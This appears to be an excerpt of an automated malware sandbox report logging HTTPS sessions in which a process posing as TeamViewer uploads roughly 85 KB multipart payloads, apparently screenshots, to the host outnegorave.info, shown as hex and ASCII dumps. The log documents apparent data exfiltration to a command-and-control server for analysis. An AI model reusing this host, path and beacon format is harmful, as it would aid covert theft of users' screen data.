                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:11 UTC931OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 34 37 33 30 32 37 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------847302753Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:11 UTC932OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 0b 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:11 UTC932OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:11 UTC948OUTData Raw: 02 ff 00 f2 61 68 fb 5e a3 ff 00 40 bf fc 98 5a e1 26 f1 9e b5 27 dc 92 18 7f dc 8c 1f e7 9a eb ee 25 b0 17 12 87 d5 6f 51 83 9c aa b3 61 4e 7a 0e 2b 9a a5 29 42 d7 37 8c d4 b6 12 ea de d3 56 b4 bc b4 d6 23 8e dd 9a 50 54 19 54 b2 1d 8b 86 06 bc c7 57 d3 25 d2 af 9a da 49 12 55 eb 1c b1 9c ab af af b1 f5 1f fe ba f4 bf 3b 4e ff 00 a0 c5 ff 00 fd f6 df fc 4d 73 df 11 ca 98 74 72 8e ce a5 24 c3 37 56 18 4e 4d 3a 52 69 d8 55 12 6a e7 0f 52 43 f7 cf fb 8d ff 00 a0 9a 66 2a 48 47 ce 7f dc 6f fd 04 d7 4d 8e 73 1a 8a 5c 51 83 48 66 e7 82 ff 00 e4 6e d3 bf eb af f4 35 ed b5 e2 5e 0b ff 00 91 bb 4d ff 00 ae bf d0 d7 ae 49 08 b9 d5 a6 49 64 9c 22 41 19 55 49 9d 06 4b 49 93 f2 91 e8 3f 2a c6 a2 bc b5 35 83 b2 d0 d1 aa b7 ad b0 42 e5 59 95 64 e7 6a 96 fe 16 1d 07 d6
                                                                                                                                    Data Ascii: ah^@Z&'%oQaNz+)B7V#PTTW%IU;NMstr$7VNM:RiUjRCf*HGoMs\QHfn5^MIId"AUIKI?*5BYdj
                                                                                                                                    2021-09-15 11:52:11 UTC964OUTData Raw: 18 54 b8 b0 4e c5 b1 64 4f dd 90 1a 5f b0 4b ec 7f 1a ac b2 b0 e8 4d 4c 97 72 2f f1 54 35 35 b1 69 c3 aa 1f fd 9f 21 ea b4 d6 d3 a4 ec bf a5 4e 9a 8b 0f bd 53 a6 a4 bd ea 1c aa a3 68 c6 8b ea 65 49 63 2a ff 00 01 fc aa bb 5b b2 f5 04 7e 15 d2 26 a3 0f f1 62 a4 fb 55 8c 9f eb 15 69 7b 79 ad e2 68 a8 c1 fc 32 39 61 1e 78 c5 06 23 5d 9d 8d ae 99 3c c1 a3 0a 5b d2 a7 b9 6b 1b 69 0c 42 08 f7 63 3c 81 59 bc 77 bd ca a2 6d 1c 13 71 e6 72 d0 e0 8a 1c f0 09 a5 16 f3 1e 91 48 7f e0 26 bb 19 64 67 18 83 c8 4f f8 0d 67 cd 6d a8 49 d2 e1 7f 0e 2b 48 e2 5b dd 58 ce 54 39 76 77 39 ff 00 b1 cf de 26 1f 5a 43 6e e3 ef 60 7e 35 a7 2e 9f 7c 79 6c b7 e3 55 9e ce e1 3a c4 d5 b4 6a 27 d4 c2 4a 4b a1 57 c8 f5 61 4b e4 a8 ea d5 2b 45 22 f5 52 3f 0a 6e d2 3a 8a d1 34 66 db 1b e5
                                                                                                                                    Data Ascii: TNdO_KMLr/T55i!NSheIc*[~&bUi{yh29ax#]<[kiBc<YwmqrH&dgOgmI+H[XT9vw9&ZCn`~5.|ylU:j'JKWaK+E"R?n:4f
                                                                                                                                    2021-09-15 11:52:11 UTC980OUTData Raw: 3e 93 fd da ca 35 38 7f e1 a3 3c 57 f1 18 98 a3 a5 14 56 e7 30 b4 e1 8a 6d 2d 21 a1 d4 b4 da 5a 45 0b 9a 70 a6 8a 51 49 94 87 0a 5c d3 69 c3 9a 4c b4 38 53 f3 4d 51 4f a8 65 a1 45 3e 9a 29 6a 59 a2 16 81 4a 29 d8 a4 52 41 45 14 52 18 e1 4e 14 c1 4f 15 2c a4 38 53 85 34 52 d4 b2 d0 be b5 c2 f8 cc e6 e6 df fd c6 fe 75 dd 66 b8 5f 18 ff 00 c7 d5 bf fb 87 f9 d5 d2 dc 99 ee 8e 1f 34 51 49 58 9d 62 d1 45 14 00 0a 5a 28 a0 02 96 92 96 98 83 bd 14 51 40 06 69 69 29 68 01 68 a4 a5 a6 21 28 a5 34 94 00 51 45 14 00 51 45 14 00 b4 94 52 d0 01 45 14 50 02 d0 29 28 cd 31 0e a2 92 96 98 05 14 52 d0 20 a5 a2 8c 53 10 b4 b4 94 53 10 1a 51 49 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94
                                                                                                                                    Data Ascii: >58<WV0m-!ZEpQI\iL8SMQOeE>)jYJ)RAERNO,8S4Ruf_4QIXbEZ(Q@ii)hh!(4QEQEREP)(1R SSQIJ(E%(4@8S6E%-0(h`QE)i
                                                                                                                                    2021-09-15 11:52:11 UTC996OUTData Raw: 37 a0 51 45 15 44 85 14 51 40 05 2d 14 53 10 51 45 14 00 b4 52 51 40 0b 4b 49 45 02 16 8a 4a 5a 60 14 51 45 00 14 0a 28 a0 05 a2 93 8a 33 40 0e a2 93 34 66 9d c5 61 c2 8a 6e 68 a2 e1 61 f4 64 53 28 a7 71 58 7e 68 cd 36 8a 2e 16 1d 9a 4c d1 45 00 14 51 45 00 2d 14 94 53 01 69 69 28 14 08 5a 28 a2 80 16 8a 4a 29 88 75 14 94 50 02 8a 5a 4a 28 10 b4 b4 da 5a 60 3a 8a 6d 14 c5 61 d4 52 66 96 80 0a 5a 4a 29 88 5a 28 a2 81 0b 46 69 05 2d 30 16 8a 4a 5a 00 5a 29 29 69 88 5a 29 29 68 10 b4 a2 92 96 98 82 8a 4a 5a 60 2d 2d 36 96 81 0e 14 52 52 d5 08 51 4b 4d cd 2d 31 0e cd 2d 36 96 81 0e 14 a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5
                                                                                                                                    Data Ascii: 7QEDQ@-SQERQ@KIEJZ`QE(3@4fanhadS(qX~h6.LEQE-Sii(Z(J)uPZJ(Z`:maRfZJ)Z(Fi-0JZZ))iZ))hJZ`--6RRQKM-1-6JRdAE 4U"E4Z.+)sL;\&.iFiw
                                                                                                                                    2021-09-15 11:52:11 UTC1012OUTData Raw: 72 fd 46 31 58 da ef 80 35 51 7d 9d 1f 4e 26 dc 86 e0 ce 9c 61 d8 0e ad 9e 54 2b 7f c0 ab ae b4 fe d4 7b 39 f3 78 5d fc c4 c1 17 8a d8 18 6c f3 bb 8e df 97 b5 74 9a 48 98 69 b1 0b 87 2f 27 39 25 f7 67 93 de b9 e1 5d ca a7 b3 71 69 da e5 d4 82 8c 9a 8b ba ee b6 3e 76 a2 8a 2b a4 cc 2b 5f 44 f0 d6 ad ae b8 16 16 ac 62 ce 1a 67 f9 63 5f c7 bf d0 64 d6 45 7a e7 85 3c 3f a5 eb 9e 01 d3 d3 50 b5 57 60 25 0b 2a f0 e9 fb d7 e8 df d3 a5 0c 62 69 3f 0c b4 b8 2d db fb 52 69 2e e7 75 c6 51 8a 2a 7d 31 c9 3f 5f ca b9 ed 7f e1 ae a1 67 ba 6d 22 4f b6 c2 39 f2 db 0b 28 fe 8d fa 7d 29 9e 20 f8 71 a8 d8 6e 9b 4a 63 7d 00 e7 60 18 95 47 d3 f8 bf 0e 7d ab a0 f0 8f 81 b4 33 6b 1d f5 cc bf da 32 1e a8 cb b5 23 6e ea 53 ae 47 70 df 95 20 3c ae 68 a4 82 56 8a 78 de 39 10 e1 91
                                                                                                                                    Data Ascii: rF1X5Q}N&aT+{9x]ltHi/'9%g]qi>v++_Dbgc_dEz<?PW`%*bi?-Ri.uQ*}1?_gm"O9(}) qnJc}`G}3k2#nSGp <hVx9
                                                                                                                                    2021-09-15 11:52:11 UTC1015OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 34 37 33 30 32 37 35 33 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------847302753--
                                                                                                                                    2021-09-15 11:52:11 UTC1015INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:11 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=479b52c9bf4fa67acfa7b1cc6f2e5c84c9ad73e40dd3393f96f0aaee9007cbf9; expires=Thu, 15-Sep-2022 11:52:11 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UeCPOliV2lUw7ibgotG67Icrr4QUUBkEdP1eu%2BGzjwxbS830BQ9tD7dFuNCoP8ved7hjiHrpudZKJJ5BMs8uFMK1sMhDzqrlXmWxDkOZ%2FrbX45AaJrnM9ARWEFkoxnUhZSa2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5bf8c38bef6-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:11 UTC1016INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    12192.168.2.549790172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:12 UTC1016OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85014
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------4150287082
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:12 UTC1016OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 31 35 30 32 38 37 30 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4150287082Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:12 UTC1016OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 95 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:12 UTC1016OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:12 UTC1032OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:12 UTC1048OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:12 UTC1064OUTData Raw: 00 51 45 14 00 b4 0a 4a 33 4c 43 a8 a4 a5 a6 01 45 14 b4 08 29 68 a3 14 c4 2d 2d 25 14 c4 06 94 52 52 8a 00 51 49 4a 29 0d 31 05 2d 25 02 90 0e 14 e1 4d a5 aa 42 62 d1 49 4b 4c 05 a2 8a 28 24 5a 28 a2 98 05 14 51 40 87 0a 5a 68 a5 14 d0 0b 4b 49 4b 4c 90 a5 a4 a5 14 c0 5a 28 a2 98 85 a2 92 96 81 05 2d 25 2d 34 03 a8 a4 14 b4 c9 0a 51 45 14 c0 5a 28 14 b4 c4 25 25 2d 14 00 83 ad 3e 98 3a d3 e8 40 c2 83 45 14 c9 01 4b 48 29 d8 a1 03 14 0a 75 36 9c 2a 91 2c 4e f4 b4 87 ad 38 53 01 05 3a 9b 4a 29 89 8b 45 14 50 20 14 b4 82 9d 4c 42 53 a9 28 a6 0c 75 2d 34 52 d3 24 76 69 45 36 94 53 42 63 85 2d 36 9c 29 92 c2 96 92 8a 62 16 8a 4a 5a 00 29 69 29 68 01 69 69 b4 ea 04 c2 94 52 52 d0 21 68 a4 a5 a0 41 4b 45 14 c0 29 45 14 a2 81 31 68 14 94 a2 81 1a 1a 48 fd fb 9f
                                                                                                                                    Data Ascii: QEJ3LCE)h--%RRQIJ)1-%MBbIKL($Z(Q@ZhKIKLZ(-%-4QEZ(%%->:@EKH)u6*,N8S:J)EP LBS(u-4R$viE6SBc-6)bJZ)i)hiiRR!hAKE)E1hH
                                                                                                                                    2021-09-15 11:52:12 UTC1080OUTData Raw: 5a 62 16 8a 4a 5a 04 2d 28 a4 a5 a6 20 a2 92 96 98 0b 4b 4d a5 a0 43 85 14 94 b5 42 14 52 d3 73 4b 4c 43 b3 4b 4d a5 a0 43 85 28 a6 d2 83 54 99 2c 90 51 48 0d 15 48 91 69 69 28 cd 30 b0 b9 a3 34 82 96 8b 8a c2 8a 5c d3 29 73 4e e1 61 f9 a5 a6 66 97 34 c9 b0 e1 4b 9a 6e 68 a7 70 b0 fc d1 9a 6e 68 dd ed 45 c5 62 40 69 73 51 ee 3e b4 67 de 9d c5 62 4c 8a 33 51 e6 97 34 5c 56 1f 9a 33 4d cd 19 a7 70 b0 ea 5c d3 68 cd 17 15 87 66 97 34 cc d1 9a 77 0b 0f cd 19 a6 6e a4 dd 45 c3 94 93 34 66 a3 dd 46 ea 57 0e 52 4d d4 9b aa 22 f4 d2 f4 39 0d 40 98 b5 34 bd 44 5e 9a 5a a5 cc a5 02 52 f4 c2 f5 19 6a 61 6a 87 22 d4 09 0b fb d3 0b 53 0b 53 0b 54 39 1a 28 8f 2d 4c 2d 4d 2d 4c 2d 59 b9 1a 28 8e 26 98 4d 21 34 95 0d 96 90 a4 d2 52 51 9a 4c 76 10 d1 41 a6 d4 94 83 34 52
                                                                                                                                    Data Ascii: ZbJZ-( KMCBRsKLCKMC(T,QHHii(04\)sNaf4KnhpnhEb@isQ>gbL3Q4\V3Mp\hf4wnE4fFWRM"9@4D^ZRjaj"SST9(-L-M-L-Y(&M!4RQLvA4R
                                                                                                                                    2021-09-15 11:52:12 UTC1096OUTData Raw: 62 8a 9f 4c 72 4f d7 f2 ae 7b 5f f8 6b a8 59 ee 9b 48 93 ed b0 8e 7c b6 c2 ca 3f a3 7e 9f 4a 67 88 3e 1c 6a 36 1b a6 d2 98 df 40 39 d8 06 25 51 f4 fe 2f c3 9f 6a e8 3c 23 e0 6d 0c da c7 7d 73 2f f6 8c 87 aa 32 ed 48 db ba 94 eb 91 dc 37 e5 48 0f 2b 9a 29 20 95 a2 9e 37 8e 44 38 64 75 20 83 ee 0d 32 ba 3f 88 48 91 f8 d6 fd 23 55 44 51 10 0a a3 00 0f 29 2b 9c aa 10 55 bd 36 c9 af ae 84 60 ed 41 cb b7 a0 aa 95 d0 78 5f 6e 2e 41 eb f2 fe 5c d4 c9 d9 68 45 4a 8a 9a e7 6a f6 37 2c f4 6b 70 9b 2d ac c4 9b 47 24 a6 e3 f8 d5 7d 43 c3 82 e1 58 47 6a d0 cc 3a 15 42 3f 31 5b a3 7f f6 6d b8 8b 26 31 9d f8 fe fe 7b fe 18 ad bd 37 cd fb 0a 79 f9 dd 93 b7 77 5d bd bf ad 61 89 a5 2a 18 75 88 52 d7 b1 e8 c3 1d 4e b4 fd 94 61 ee 9e 2d 34 4f 04 cf 14 aa 55 d0 95 60 7b 1a 65
                                                                                                                                    Data Ascii: bLrO{_kYH|?~Jg>j6@9%Q/j<#m}s/2H7H+) 7D8du 2?H#UDQ)+U6`Ax_n.A\hEJj7,kp-G$}CXGj:B?1[m&1{7yw]a*uRNa-4OU`{e
                                                                                                                                    2021-09-15 11:52:12 UTC1099OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 31 35 30 32 38 37 30 38 32 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4150287082--
                                                                                                                                    2021-09-15 11:52:13 UTC1099INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:13 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ef3fa9918023131a618282a38fc262eaf3c6afe023126f9d95e1fb593b59ff6c; expires=Thu, 15-Sep-2022 11:52:12 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3FQWPD%2BwQbJucpj6%2FR7WfYxwqwax8zaTdRFMEHPWE6o1%2BlPtqx1WdvSHyywGLehe7m9u7YUZIHVhxvnfz7GgM0z%2BNH%2BVSR2%2BbYnLFP%2B2QgmNkc6kS4aSDPVGn08sljMVjS1G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5c6ed40d6d5-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:13 UTC1100INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    13192.168.2.549799172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:13 UTC1100OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85006
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2687879271
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:13 UTC1100OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 38 37 38 37 39 32 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2687879271Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:13 UTC1100OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 6d 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^m;ZV}}h-^fcK++f$[G.:,rI`l+$
